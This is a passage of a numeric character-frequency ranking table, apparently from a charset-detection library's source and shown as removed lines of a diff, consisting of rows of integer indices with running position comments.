-3698,2718,1139,1820,4234,2022,1124,2164,2791,1778,2659,5105,3097, 363,1655,3214, # 1072 -5106,2993,5107,5108,5109,3992,1567,3993, 718, 103,3215, 849,1443, 341,3357,2949, # 1088 -1484,5110,1712, 127, 67, 339,4235,2403, 679,1412, 821,5111,5112, 834, 738, 351, # 1104 -2994,2147, 846, 235,1497,1881, 418,1993,3828,2719, 186,1100,2148,2756,3575,1545, # 1120 -1355,2950,2872,1377, 583,3994,4236,2581,2995,5113,1298,3699,1078,2557,3700,2363, # 1136 - 78,3829,3830, 267,1289,2100,2002,1594,4237, 348, 369,1274,2197,2178,1838,4552, # 1152 -1821,2830,3701,2757,2288,2003,4553,2951,2758, 144,3358, 882,4554,3995,2759,3470, # 1168 -4555,2915,5114,4238,1726, 320,5115,3996,3046, 788,2996,5116,2831,1774,1327,2873, # 1184 -3997,2832,5117,1306,4556,2004,1700,3831,3576,2364,2660, 787,2023, 506, 824,3702, # 1200 - 534, 323,4557,1044,3359,2024,1901, 946,3471,5118,1779,1500,1678,5119,1882,4558, # 1216 - 165, 243,4559,3703,2528, 123, 683,4239, 764,4560, 36,3998,1793, 589,2916, 816, # 1232 - 626,1667,3047,2237,1639,1555,1622,3832,3999,5120,4000,2874,1370,1228,1933, 891, # 1248 -2084,2917, 304,4240,5121, 292,2997,2720,3577, 691,2101,4241,1115,4561, 118, 662, # 1264 -5122, 611,1156, 854,2386,1316,2875, 2, 386, 515,2918,5123,5124,3286, 868,2238, # 1280 -1486, 855,2661, 785,2216,3048,5125,1040,3216,3578,5126,3146, 448,5127,1525,5128, # 1296 -2165,4562,5129,3833,5130,4242,2833,3579,3147, 503, 818,4001,3148,1568, 814, 676, # 1312 -1444, 306,1749,5131,3834,1416,1030, 197,1428, 805,2834,1501,4563,5132,5133,5134, # 1328 -1994,5135,4564,5136,5137,2198, 13,2792,3704,2998,3149,1229,1917,5138,3835,2132, # 1344 -5139,4243,4565,2404,3580,5140,2217,1511,1727,1120,5141,5142, 646,3836,2448, 307, # 1360 -5143,5144,1595,3217,5145,5146,5147,3705,1113,1356,4002,1465,2529,2530,5148, 519, # 1376 -5149, 128,2133, 92,2289,1980,5150,4003,1512, 342,3150,2199,5151,2793,2218,1981, # 1392 -3360,4244, 290,1656,1317, 789, 827,2365,5152,3837,4566, 562, 581,4004,5153, 401, # 1408 -4567,2252, 94,4568,5154,1399,2794,5155,1463,2025,4569,3218,1944,5156, 828,1105, # 1424 -4245,1262,1394,5157,4246, 605,4570,5158,1784,2876,5159,2835, 819,2102, 578,2200, # 1440 -2952,5160,1502, 436,3287,4247,3288,2836,4005,2919,3472,3473,5161,2721,2320,5162, # 1456 -5163,2337,2068, 23,4571, 193, 826,3838,2103, 699,1630,4248,3098, 390,1794,1064, # 1472 -3581,5164,1579,3099,3100,1400,5165,4249,1839,1640,2877,5166,4572,4573, 137,4250, # 1488 - 598,3101,1967, 780, 104, 974,2953,5167, 278, 899, 253, 402, 572, 504, 493,1339, # 1504 -5168,4006,1275,4574,2582,2558,5169,3706,3049,3102,2253, 565,1334,2722, 863, 41, # 1520 -5170,5171,4575,5172,1657,2338, 19, 463,2760,4251, 606,5173,2999,3289,1087,2085, # 1536 -1323,2662,3000,5174,1631,1623,1750,4252,2691,5175,2878, 791,2723,2663,2339, 232, # 1552 -2421,5176,3001,1498,5177,2664,2630, 755,1366,3707,3290,3151,2026,1609, 119,1918, # 1568 -3474, 862,1026,4253,5178,4007,3839,4576,4008,4577,2265,1952,2477,5179,1125, 817, # 1584 -4254,4255,4009,1513,1766,2041,1487,4256,3050,3291,2837,3840,3152,5180,5181,1507, # 1600 -5182,2692, 733, 40,1632,1106,2879, 345,4257, 841,2531, 230,4578,3002,1847,3292, # 1616 -3475,5183,1263, 986,3476,5184, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562, # 1632 -4010,4011,2954, 967,2761,2665,1349, 592,2134,1692,3361,3003,1995,4258,1679,4012, # 1648 -1902,2188,5185, 739,3708,2724,1296,1290,5186,4259,2201,2202,1922,1563,2605,2559, # 1664 -1871,2762,3004,5187, 435,5188, 343,1108, 596, 17,1751,4579,2239,3477,3709,5189, # 1680 -4580, 294,3582,2955,1693, 477, 979, 281,2042,3583, 643,2043,3710,2631,2795,2266, # 1696 -1031,2340,2135,2303,3584,4581, 367,1249,2560,5190,3585,5191,4582,1283,3362,2005, # 1712 - 240,1762,3363,4583,4584, 836,1069,3153, 474,5192,2149,2532, 268,3586,5193,3219, # 1728 -1521,1284,5194,1658,1546,4260,5195,3587,3588,5196,4261,3364,2693,1685,4262, 961, # 1744 -1673,2632, 190,2006,2203,3841,4585,4586,5197, 570,2504,3711,1490,5198,4587,2633, # 1760 -3293,1957,4588, 584,1514, 396,1045,1945,5199,4589,1968,2449,5200,5201,4590,4013, # 1776 - 619,5202,3154,3294, 215,2007,2796,2561,3220,4591,3221,4592, 763,4263,3842,4593, # 1792 -5203,5204,1958,1767,2956,3365,3712,1174, 452,1477,4594,3366,3155,5205,2838,1253, # 1808 -2387,2189,1091,2290,4264, 492,5206, 638,1169,1825,2136,1752,4014, 648, 926,1021, # 1824 -1324,4595, 520,4596, 997, 847,1007, 892,4597,3843,2267,1872,3713,2405,1785,4598, # 1840 -1953,2957,3103,3222,1728,4265,2044,3714,4599,2008,1701,3156,1551, 30,2268,4266, # 1856 -5207,2027,4600,3589,5208, 501,5209,4267, 594,3478,2166,1822,3590,3479,3591,3223, # 1872 - 829,2839,4268,5210,1680,3157,1225,4269,5211,3295,4601,4270,3158,2341,5212,4602, # 1888 -4271,5213,4015,4016,5214,1848,2388,2606,3367,5215,4603, 374,4017, 652,4272,4273, # 1904 - 375,1140, 798,5216,5217,5218,2366,4604,2269, 546,1659, 138,3051,2450,4605,5219, # 1920 -2254, 612,1849, 910, 796,3844,1740,1371, 825,3845,3846,5220,2920,2562,5221, 692, # 1936 - 444,3052,2634, 801,4606,4274,5222,1491, 244,1053,3053,4275,4276, 340,5223,4018, # 1952 -1041,3005, 293,1168, 87,1357,5224,1539, 959,5225,2240, 721, 694,4277,3847, 219, # 1968 -1478, 644,1417,3368,2666,1413,1401,1335,1389,4019,5226,5227,3006,2367,3159,1826, # 1984 - 730,1515, 184,2840, 66,4607,5228,1660,2958, 246,3369, 378,1457, 226,3480, 975, # 2000 -4020,2959,1264,3592, 674, 696,5229, 163,5230,1141,2422,2167, 713,3593,3370,4608, # 2016 -4021,5231,5232,1186, 15,5233,1079,1070,5234,1522,3224,3594, 276,1050,2725, 758, # 2032 -1126, 653,2960,3296,5235,2342, 889,3595,4022,3104,3007, 903,1250,4609,4023,3481, # 2048 -3596,1342,1681,1718, 766,3297, 286, 89,2961,3715,5236,1713,5237,2607,3371,3008, # 2064 -5238,2962,2219,3225,2880,5239,4610,2505,2533, 181, 387,1075,4024, 731,2190,3372, # 2080 -5240,3298, 310, 313,3482,2304, 770,4278, 54,3054, 189,4611,3105,3848,4025,5241, # 2096 -1230,1617,1850, 355,3597,4279,4612,3373, 111,4280,3716,1350,3160,3483,3055,4281, # 2112 -2150,3299,3598,5242,2797,4026,4027,3009, 722,2009,5243,1071, 247,1207,2343,2478, # 2128 -1378,4613,2010, 864,1437,1214,4614, 373,3849,1142,2220, 667,4615, 442,2763,2563, # 2144 -3850,4028,1969,4282,3300,1840, 837, 170,1107, 934,1336,1883,5244,5245,2119,4283, # 2160 -2841, 743,1569,5246,4616,4284, 582,2389,1418,3484,5247,1803,5248, 357,1395,1729, # 2176 -3717,3301,2423,1564,2241,5249,3106,3851,1633,4617,1114,2086,4285,1532,5250, 482, # 2192 -2451,4618,5251,5252,1492, 833,1466,5253,2726,3599,1641,2842,5254,1526,1272,3718, # 2208 -4286,1686,1795, 416,2564,1903,1954,1804,5255,3852,2798,3853,1159,2321,5256,2881, # 2224 -4619,1610,1584,3056,2424,2764, 443,3302,1163,3161,5257,5258,4029,5259,4287,2506, # 2240 -3057,4620,4030,3162,2104,1647,3600,2011,1873,4288,5260,4289, 431,3485,5261, 250, # 2256 - 97, 81,4290,5262,1648,1851,1558, 160, 848,5263, 866, 740,1694,5264,2204,2843, # 2272 -3226,4291,4621,3719,1687, 950,2479, 426, 469,3227,3720,3721,4031,5265,5266,1188, # 2288 - 424,1996, 861,3601,4292,3854,2205,2694, 168,1235,3602,4293,5267,2087,1674,4622, # 2304 -3374,3303, 220,2565,1009,5268,3855, 670,3010, 332,1208, 717,5269,5270,3603,2452, # 2320 -4032,3375,5271, 513,5272,1209,2882,3376,3163,4623,1080,5273,5274,5275,5276,2534, # 2336 -3722,3604, 815,1587,4033,4034,5277,3605,3486,3856,1254,4624,1328,3058,1390,4035, # 2352 -1741,4036,3857,4037,5278, 236,3858,2453,3304,5279,5280,3723,3859,1273,3860,4625, # 2368 -5281, 308,5282,4626, 245,4627,1852,2480,1307,2583, 430, 715,2137,2454,5283, 270, # 2384 - 199,2883,4038,5284,3606,2727,1753, 761,1754, 725,1661,1841,4628,3487,3724,5285, # 2400 -5286, 587, 14,3305, 227,2608, 326, 480,2270, 943,2765,3607, 291, 650,1884,5287, # 2416 -1702,1226, 102,1547, 62,3488, 904,4629,3489,1164,4294,5288,5289,1224,1548,2766, # 2432 - 391, 498,1493,5290,1386,1419,5291,2056,1177,4630, 813, 880,1081,2368, 566,1145, # 2448 -4631,2291,1001,1035,2566,2609,2242, 394,1286,5292,5293,2069,5294, 86,1494,1730, # 2464 -4039, 491,1588, 745, 897,2963, 843,3377,4040,2767,2884,3306,1768, 998,2221,2070, # 2480 - 397,1827,1195,1970,3725,3011,3378, 284,5295,3861,2507,2138,2120,1904,5296,4041, # 2496 -2151,4042,4295,1036,3490,1905, 114,2567,4296, 209,1527,5297,5298,2964,2844,2635, # 2512 -2390,2728,3164, 812,2568,5299,3307,5300,1559, 737,1885,3726,1210, 885, 28,2695, # 2528 -3608,3862,5301,4297,1004,1780,4632,5302, 346,1982,2222,2696,4633,3863,1742, 797, # 2544 -1642,4043,1934,1072,1384,2152, 896,4044,3308,3727,3228,2885,3609,5303,2569,1959, # 2560 -4634,2455,1786,5304,5305,5306,4045,4298,1005,1308,3728,4299,2729,4635,4636,1528, # 2576 -2610, 161,1178,4300,1983, 987,4637,1101,4301, 631,4046,1157,3229,2425,1343,1241, # 2592 -1016,2243,2570, 372, 877,2344,2508,1160, 555,1935, 911,4047,5307, 466,1170, 169, # 2608 -1051,2921,2697,3729,2481,3012,1182,2012,2571,1251,2636,5308, 992,2345,3491,1540, # 2624 -2730,1201,2071,2406,1997,2482,5309,4638, 528,1923,2191,1503,1874,1570,2369,3379, # 2640 -3309,5310, 557,1073,5311,1828,3492,2088,2271,3165,3059,3107, 767,3108,2799,4639, # 2656 -1006,4302,4640,2346,1267,2179,3730,3230, 778,4048,3231,2731,1597,2667,5312,4641, # 2672 -5313,3493,5314,5315,5316,3310,2698,1433,3311, 131, 95,1504,4049, 723,4303,3166, # 2688 -1842,3610,2768,2192,4050,2028,2105,3731,5317,3013,4051,1218,5318,3380,3232,4052, # 2704 -4304,2584, 248,1634,3864, 912,5319,2845,3732,3060,3865, 654, 53,5320,3014,5321, # 2720 -1688,4642, 777,3494,1032,4053,1425,5322, 191, 820,2121,2846, 971,4643, 931,3233, # 2736 - 135, 664, 783,3866,1998, 772,2922,1936,4054,3867,4644,2923,3234, 282,2732, 640, # 2752 -1372,3495,1127, 922, 325,3381,5323,5324, 711,2045,5325,5326,4055,2223,2800,1937, # 2768 -4056,3382,2224,2255,3868,2305,5327,4645,3869,1258,3312,4057,3235,2139,2965,4058, # 2784 -4059,5328,2225, 258,3236,4646, 101,1227,5329,3313,1755,5330,1391,3314,5331,2924, # 2800 -2057, 893,5332,5333,5334,1402,4305,2347,5335,5336,3237,3611,5337,5338, 878,1325, # 2816 -1781,2801,4647, 259,1385,2585, 744,1183,2272,4648,5339,4060,2509,5340, 684,1024, # 2832 -4306,5341, 472,3612,3496,1165,3315,4061,4062, 322,2153, 881, 455,1695,1152,1340, # 2848 - 660, 554,2154,4649,1058,4650,4307, 830,1065,3383,4063,4651,1924,5342,1703,1919, # 2864 -5343, 932,2273, 122,5344,4652, 947, 677,5345,3870,2637, 297,1906,1925,2274,4653, # 2880 -2322,3316,5346,5347,4308,5348,4309, 84,4310, 112, 989,5349, 547,1059,4064, 701, # 2896 -3613,1019,5350,4311,5351,3497, 942, 639, 457,2306,2456, 993,2966, 407, 851, 494, # 2912 -4654,3384, 927,5352,1237,5353,2426,3385, 573,4312, 680, 921,2925,1279,1875, 285, # 2928 - 790,1448,1984, 719,2168,5354,5355,4655,4065,4066,1649,5356,1541, 563,5357,1077, # 2944 -5358,3386,3061,3498, 511,3015,4067,4068,3733,4069,1268,2572,3387,3238,4656,4657, # 2960 -5359, 535,1048,1276,1189,2926,2029,3167,1438,1373,2847,2967,1134,2013,5360,4313, # 2976 -1238,2586,3109,1259,5361, 700,5362,2968,3168,3734,4314,5363,4315,1146,1876,1907, # 2992 -4658,2611,4070, 781,2427, 132,1589, 203, 147, 273,2802,2407, 898,1787,2155,4071, # 3008 -4072,5364,3871,2803,5365,5366,4659,4660,5367,3239,5368,1635,3872, 965,5369,1805, # 3024 -2699,1516,3614,1121,1082,1329,3317,4073,1449,3873, 65,1128,2848,2927,2769,1590, # 3040 -3874,5370,5371, 12,2668, 45, 976,2587,3169,4661, 517,2535,1013,1037,3240,5372, # 3056 -3875,2849,5373,3876,5374,3499,5375,2612, 614,1999,2323,3877,3110,2733,2638,5376, # 3072 -2588,4316, 599,1269,5377,1811,3735,5378,2700,3111, 759,1060, 489,1806,3388,3318, # 3088 -1358,5379,5380,2391,1387,1215,2639,2256, 490,5381,5382,4317,1759,2392,2348,5383, # 3104 -4662,3878,1908,4074,2640,1807,3241,4663,3500,3319,2770,2349, 874,5384,5385,3501, # 3120 -3736,1859, 91,2928,3737,3062,3879,4664,5386,3170,4075,2669,5387,3502,1202,1403, # 3136 -3880,2969,2536,1517,2510,4665,3503,2511,5388,4666,5389,2701,1886,1495,1731,4076, # 3152 -2370,4667,5390,2030,5391,5392,4077,2702,1216, 237,2589,4318,2324,4078,3881,4668, # 3168 -4669,2703,3615,3504, 445,4670,5393,5394,5395,5396,2771, 61,4079,3738,1823,4080, # 3184 -5397, 687,2046, 935, 925, 405,2670, 703,1096,1860,2734,4671,4081,1877,1367,2704, # 3200 -3389, 918,2106,1782,2483, 334,3320,1611,1093,4672, 564,3171,3505,3739,3390, 945, # 3216 -2641,2058,4673,5398,1926, 872,4319,5399,3506,2705,3112, 349,4320,3740,4082,4674, # 3232 -3882,4321,3741,2156,4083,4675,4676,4322,4677,2408,2047, 782,4084, 400, 251,4323, # 3248 -1624,5400,5401, 277,3742, 299,1265, 476,1191,3883,2122,4324,4325,1109, 205,5402, # 3264 -2590,1000,2157,3616,1861,5403,5404,5405,4678,5406,4679,2573, 107,2484,2158,4085, # 3280 -3507,3172,5407,1533, 541,1301, 158, 753,4326,2886,3617,5408,1696, 370,1088,4327, # 3296 -4680,3618, 579, 327, 440, 162,2244, 269,1938,1374,3508, 968,3063, 56,1396,3113, # 3312 -2107,3321,3391,5409,1927,2159,4681,3016,5410,3619,5411,5412,3743,4682,2485,5413, # 3328 -2804,5414,1650,4683,5415,2613,5416,5417,4086,2671,3392,1149,3393,4087,3884,4088, # 3344 -5418,1076, 49,5419, 951,3242,3322,3323, 450,2850, 920,5420,1812,2805,2371,4328, # 3360 -1909,1138,2372,3885,3509,5421,3243,4684,1910,1147,1518,2428,4685,3886,5422,4686, # 3376 -2393,2614, 260,1796,3244,5423,5424,3887,3324, 708,5425,3620,1704,5426,3621,1351, # 3392 -1618,3394,3017,1887, 944,4329,3395,4330,3064,3396,4331,5427,3744, 422, 413,1714, # 3408 -3325, 500,2059,2350,4332,2486,5428,1344,1911, 954,5429,1668,5430,5431,4089,2409, # 3424 -4333,3622,3888,4334,5432,2307,1318,2512,3114, 133,3115,2887,4687, 629, 31,2851, # 3440 -2706,3889,4688, 850, 949,4689,4090,2970,1732,2089,4335,1496,1853,5433,4091, 620, # 3456 -3245, 981,1242,3745,3397,1619,3746,1643,3326,2140,2457,1971,1719,3510,2169,5434, # 3472 -3246,5435,5436,3398,1829,5437,1277,4690,1565,2048,5438,1636,3623,3116,5439, 869, # 3488 -2852, 655,3890,3891,3117,4092,3018,3892,1310,3624,4691,5440,5441,5442,1733, 558, # 3504 -4692,3747, 335,1549,3065,1756,4336,3748,1946,3511,1830,1291,1192, 470,2735,2108, # 3520 -2806, 913,1054,4093,5443,1027,5444,3066,4094,4693, 982,2672,3399,3173,3512,3247, # 3536 -3248,1947,2807,5445, 571,4694,5446,1831,5447,3625,2591,1523,2429,5448,2090, 984, # 3552 -4695,3749,1960,5449,3750, 852, 923,2808,3513,3751, 969,1519, 999,2049,2325,1705, # 3568 -5450,3118, 615,1662, 151, 597,4095,2410,2326,1049, 275,4696,3752,4337, 568,3753, # 3584 -3626,2487,4338,3754,5451,2430,2275, 409,3249,5452,1566,2888,3514,1002, 769,2853, # 3600 - 194,2091,3174,3755,2226,3327,4339, 628,1505,5453,5454,1763,2180,3019,4096, 521, # 3616 -1161,2592,1788,2206,2411,4697,4097,1625,4340,4341, 412, 42,3119, 464,5455,2642, # 3632 -4698,3400,1760,1571,2889,3515,2537,1219,2207,3893,2643,2141,2373,4699,4700,3328, # 3648 -1651,3401,3627,5456,5457,3628,2488,3516,5458,3756,5459,5460,2276,2092, 460,5461, # 3664 -4701,5462,3020, 962, 588,3629, 289,3250,2644,1116, 52,5463,3067,1797,5464,5465, # 3680 -5466,1467,5467,1598,1143,3757,4342,1985,1734,1067,4702,1280,3402, 465,4703,1572, # 3696 - 510,5468,1928,2245,1813,1644,3630,5469,4704,3758,5470,5471,2673,1573,1534,5472, # 3712 -5473, 536,1808,1761,3517,3894,3175,2645,5474,5475,5476,4705,3518,2929,1912,2809, # 3728 -5477,3329,1122, 377,3251,5478, 360,5479,5480,4343,1529, 551,5481,2060,3759,1769, # 3744 -2431,5482,2930,4344,3330,3120,2327,2109,2031,4706,1404, 136,1468,1479, 672,1171, # 3760 -3252,2308, 271,3176,5483,2772,5484,2050, 678,2736, 865,1948,4707,5485,2014,4098, # 3776 -2971,5486,2737,2227,1397,3068,3760,4708,4709,1735,2931,3403,3631,5487,3895, 509, # 3792 -2854,2458,2890,3896,5488,5489,3177,3178,4710,4345,2538,4711,2309,1166,1010, 552, # 3808 - 681,1888,5490,5491,2972,2973,4099,1287,1596,1862,3179, 358, 453, 736, 175, 478, # 3824 -1117, 905,1167,1097,5492,1854,1530,5493,1706,5494,2181,3519,2292,3761,3520,3632, # 3840 -4346,2093,4347,5495,3404,1193,2489,4348,1458,2193,2208,1863,1889,1421,3331,2932, # 3856 -3069,2182,3521, 595,2123,5496,4100,5497,5498,4349,1707,2646, 223,3762,1359, 751, # 3872 -3121, 183,3522,5499,2810,3021, 419,2374, 633, 704,3897,2394, 241,5500,5501,5502, # 3888 - 838,3022,3763,2277,2773,2459,3898,1939,2051,4101,1309,3122,2246,1181,5503,1136, # 3904 -2209,3899,2375,1446,4350,2310,4712,5504,5505,4351,1055,2615, 484,3764,5506,4102, # 3920 - 625,4352,2278,3405,1499,4353,4103,5507,4104,4354,3253,2279,2280,3523,5508,5509, # 3936 -2774, 808,2616,3765,3406,4105,4355,3123,2539, 526,3407,3900,4356, 955,5510,1620, # 3952 -4357,2647,2432,5511,1429,3766,1669,1832, 994, 928,5512,3633,1260,5513,5514,5515, # 3968 -1949,2293, 741,2933,1626,4358,2738,2460, 867,1184, 362,3408,1392,5516,5517,4106, # 3984 -4359,1770,1736,3254,2934,4713,4714,1929,2707,1459,1158,5518,3070,3409,2891,1292, # 4000 -1930,2513,2855,3767,1986,1187,2072,2015,2617,4360,5519,2574,2514,2170,3768,2490, # 4016 -3332,5520,3769,4715,5521,5522, 666,1003,3023,1022,3634,4361,5523,4716,1814,2257, # 4032 - 574,3901,1603, 295,1535, 705,3902,4362, 283, 858, 417,5524,5525,3255,4717,4718, # 4048 -3071,1220,1890,1046,2281,2461,4107,1393,1599, 689,2575, 388,4363,5526,2491, 802, # 4064 -5527,2811,3903,2061,1405,2258,5528,4719,3904,2110,1052,1345,3256,1585,5529, 809, # 4080 -5530,5531,5532, 575,2739,3524, 956,1552,1469,1144,2328,5533,2329,1560,2462,3635, # 4096 -3257,4108, 616,2210,4364,3180,2183,2294,5534,1833,5535,3525,4720,5536,1319,3770, # 4112 -3771,1211,3636,1023,3258,1293,2812,5537,5538,5539,3905, 607,2311,3906, 762,2892, # 4128 -1439,4365,1360,4721,1485,3072,5540,4722,1038,4366,1450,2062,2648,4367,1379,4723, # 4144 -2593,5541,5542,4368,1352,1414,2330,2935,1172,5543,5544,3907,3908,4724,1798,1451, # 4160 -5545,5546,5547,5548,2936,4109,4110,2492,2351, 411,4111,4112,3637,3333,3124,4725, # 4176 -1561,2674,1452,4113,1375,5549,5550, 47,2974, 316,5551,1406,1591,2937,3181,5552, # 4192 -1025,2142,3125,3182, 354,2740, 884,2228,4369,2412, 508,3772, 726,3638, 996,2433, # 4208 -3639, 729,5553, 392,2194,1453,4114,4726,3773,5554,5555,2463,3640,2618,1675,2813, # 4224 - 919,2352,2975,2353,1270,4727,4115, 73,5556,5557, 647,5558,3259,2856,2259,1550, # 4240 -1346,3024,5559,1332, 883,3526,5560,5561,5562,5563,3334,2775,5564,1212, 831,1347, # 4256 -4370,4728,2331,3909,1864,3073, 720,3910,4729,4730,3911,5565,4371,5566,5567,4731, # 4272 -5568,5569,1799,4732,3774,2619,4733,3641,1645,2376,4734,5570,2938, 669,2211,2675, # 4288 -2434,5571,2893,5572,5573,1028,3260,5574,4372,2413,5575,2260,1353,5576,5577,4735, # 4304 -3183, 518,5578,4116,5579,4373,1961,5580,2143,4374,5581,5582,3025,2354,2355,3912, # 4320 - 516,1834,1454,4117,2708,4375,4736,2229,2620,1972,1129,3642,5583,2776,5584,2976, # 4336 -1422, 577,1470,3026,1524,3410,5585,5586, 432,4376,3074,3527,5587,2594,1455,2515, # 4352 -2230,1973,1175,5588,1020,2741,4118,3528,4737,5589,2742,5590,1743,1361,3075,3529, # 4368 -2649,4119,4377,4738,2295, 895, 924,4378,2171, 331,2247,3076, 166,1627,3077,1098, # 4384 -5591,1232,2894,2231,3411,4739, 657, 403,1196,2377, 542,3775,3412,1600,4379,3530, # 4400 -5592,4740,2777,3261, 576, 530,1362,4741,4742,2540,2676,3776,4120,5593, 842,3913, # 4416 -5594,2814,2032,1014,4121, 213,2709,3413, 665, 621,4380,5595,3777,2939,2435,5596, # 4432 -2436,3335,3643,3414,4743,4381,2541,4382,4744,3644,1682,4383,3531,1380,5597, 724, # 4448 -2282, 600,1670,5598,1337,1233,4745,3126,2248,5599,1621,4746,5600, 651,4384,5601, # 4464 -1612,4385,2621,5602,2857,5603,2743,2312,3078,5604, 716,2464,3079, 174,1255,2710, # 4480 -4122,3645, 548,1320,1398, 728,4123,1574,5605,1891,1197,3080,4124,5606,3081,3082, # 4496 -3778,3646,3779, 747,5607, 635,4386,4747,5608,5609,5610,4387,5611,5612,4748,5613, # 4512 -3415,4749,2437, 451,5614,3780,2542,2073,4388,2744,4389,4125,5615,1764,4750,5616, # 4528 -4390, 350,4751,2283,2395,2493,5617,4391,4126,2249,1434,4127, 488,4752, 458,4392, # 4544 -4128,3781, 771,1330,2396,3914,2576,3184,2160,2414,1553,2677,3185,4393,5618,2494, # 4560 -2895,2622,1720,2711,4394,3416,4753,5619,2543,4395,5620,3262,4396,2778,5621,2016, # 4576 -2745,5622,1155,1017,3782,3915,5623,3336,2313, 201,1865,4397,1430,5624,4129,5625, # 4592 -5626,5627,5628,5629,4398,1604,5630, 414,1866, 371,2595,4754,4755,3532,2017,3127, # 4608 -4756,1708, 960,4399, 887, 389,2172,1536,1663,1721,5631,2232,4130,2356,2940,1580, # 4624 -5632,5633,1744,4757,2544,4758,4759,5634,4760,5635,2074,5636,4761,3647,3417,2896, # 4640 -4400,5637,4401,2650,3418,2815, 673,2712,2465, 709,3533,4131,3648,4402,5638,1148, # 4656 - 502, 634,5639,5640,1204,4762,3649,1575,4763,2623,3783,5641,3784,3128, 948,3263, # 4672 - 121,1745,3916,1110,5642,4403,3083,2516,3027,4132,3785,1151,1771,3917,1488,4133, # 4688 -1987,5643,2438,3534,5644,5645,2094,5646,4404,3918,1213,1407,2816, 531,2746,2545, # 4704 -3264,1011,1537,4764,2779,4405,3129,1061,5647,3786,3787,1867,2897,5648,2018, 120, # 4720 -4406,4407,2063,3650,3265,2314,3919,2678,3419,1955,4765,4134,5649,3535,1047,2713, # 4736 -1266,5650,1368,4766,2858, 649,3420,3920,2546,2747,1102,2859,2679,5651,5652,2000, # 4752 -5653,1111,3651,2977,5654,2495,3921,3652,2817,1855,3421,3788,5655,5656,3422,2415, # 4768 -2898,3337,3266,3653,5657,2577,5658,3654,2818,4135,1460, 856,5659,3655,5660,2899, # 4784 -2978,5661,2900,3922,5662,4408, 632,2517, 875,3923,1697,3924,2296,5663,5664,4767, # 4800 -3028,1239, 580,4768,4409,5665, 914, 936,2075,1190,4136,1039,2124,5666,5667,5668, # 4816 -5669,3423,1473,5670,1354,4410,3925,4769,2173,3084,4137, 915,3338,4411,4412,3339, # 4832 -1605,1835,5671,2748, 398,3656,4413,3926,4138, 328,1913,2860,4139,3927,1331,4414, # 4848 -3029, 937,4415,5672,3657,4140,4141,3424,2161,4770,3425, 524, 742, 538,3085,1012, # 4864 -5673,5674,3928,2466,5675, 658,1103, 225,3929,5676,5677,4771,5678,4772,5679,3267, # 4880 -1243,5680,4142, 963,2250,4773,5681,2714,3658,3186,5682,5683,2596,2332,5684,4774, # 4896 -5685,5686,5687,3536, 957,3426,2547,2033,1931,2941,2467, 870,2019,3659,1746,2780, # 4912 -2781,2439,2468,5688,3930,5689,3789,3130,3790,3537,3427,3791,5690,1179,3086,5691, # 4928 -3187,2378,4416,3792,2548,3188,3131,2749,4143,5692,3428,1556,2549,2297, 977,2901, # 4944 -2034,4144,1205,3429,5693,1765,3430,3189,2125,1271, 714,1689,4775,3538,5694,2333, # 4960 -3931, 533,4417,3660,2184, 617,5695,2469,3340,3539,2315,5696,5697,3190,5698,5699, # 4976 -3932,1988, 618, 427,2651,3540,3431,5700,5701,1244,1690,5702,2819,4418,4776,5703, # 4992 -3541,4777,5704,2284,1576, 473,3661,4419,3432, 972,5705,3662,5706,3087,5707,5708, # 5008 -4778,4779,5709,3793,4145,4146,5710, 153,4780, 356,5711,1892,2902,4420,2144, 408, # 5024 - 803,2357,5712,3933,5713,4421,1646,2578,2518,4781,4782,3934,5714,3935,4422,5715, # 5040 -2416,3433, 752,5716,5717,1962,3341,2979,5718, 746,3030,2470,4783,4423,3794, 698, # 5056 -4784,1893,4424,3663,2550,4785,3664,3936,5719,3191,3434,5720,1824,1302,4147,2715, # 5072 -3937,1974,4425,5721,4426,3192, 823,1303,1288,1236,2861,3542,4148,3435, 774,3938, # 5088 -5722,1581,4786,1304,2862,3939,4787,5723,2440,2162,1083,3268,4427,4149,4428, 344, # 5104 -1173, 288,2316, 454,1683,5724,5725,1461,4788,4150,2597,5726,5727,4789, 985, 894, # 5120 -5728,3436,3193,5729,1914,2942,3795,1989,5730,2111,1975,5731,4151,5732,2579,1194, # 5136 - 425,5733,4790,3194,1245,3796,4429,5734,5735,2863,5736, 636,4791,1856,3940, 760, # 5152 -1800,5737,4430,2212,1508,4792,4152,1894,1684,2298,5738,5739,4793,4431,4432,2213, # 5168 - 479,5740,5741, 832,5742,4153,2496,5743,2980,2497,3797, 990,3132, 627,1815,2652, # 5184 -4433,1582,4434,2126,2112,3543,4794,5744, 799,4435,3195,5745,4795,2113,1737,3031, # 5200 -1018, 543, 754,4436,3342,1676,4796,4797,4154,4798,1489,5746,3544,5747,2624,2903, # 5216 -4155,5748,5749,2981,5750,5751,5752,5753,3196,4799,4800,2185,1722,5754,3269,3270, # 5232 -1843,3665,1715, 481, 365,1976,1857,5755,5756,1963,2498,4801,5757,2127,3666,3271, # 5248 - 433,1895,2064,2076,5758, 602,2750,5759,5760,5761,5762,5763,3032,1628,3437,5764, # 5264 -3197,4802,4156,2904,4803,2519,5765,2551,2782,5766,5767,5768,3343,4804,2905,5769, # 5280 -4805,5770,2864,4806,4807,1221,2982,4157,2520,5771,5772,5773,1868,1990,5774,5775, # 5296 -5776,1896,5777,5778,4808,1897,4158, 318,5779,2095,4159,4437,5780,5781, 485,5782, # 5312 - 938,3941, 553,2680, 116,5783,3942,3667,5784,3545,2681,2783,3438,3344,2820,5785, # 5328 -3668,2943,4160,1747,2944,2983,5786,5787, 207,5788,4809,5789,4810,2521,5790,3033, # 5344 - 890,3669,3943,5791,1878,3798,3439,5792,2186,2358,3440,1652,5793,5794,5795, 941, # 5360 -2299, 208,3546,4161,2020, 330,4438,3944,2906,2499,3799,4439,4811,5796,5797,5798, # 5376 #last 512 -#Everything below is of no interest for detection purpose -2522,1613,4812,5799,3345,3945,2523,5800,4162,5801,1637,4163,2471,4813,3946,5802, # 5392 -2500,3034,3800,5803,5804,2195,4814,5805,2163,5806,5807,5808,5809,5810,5811,5812, # 5408 -5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828, # 5424 -5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844, # 5440 -5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856,5857,5858,5859,5860, # 5456 -5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872,5873,5874,5875,5876, # 5472 -5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888,5889,5890,5891,5892, # 5488 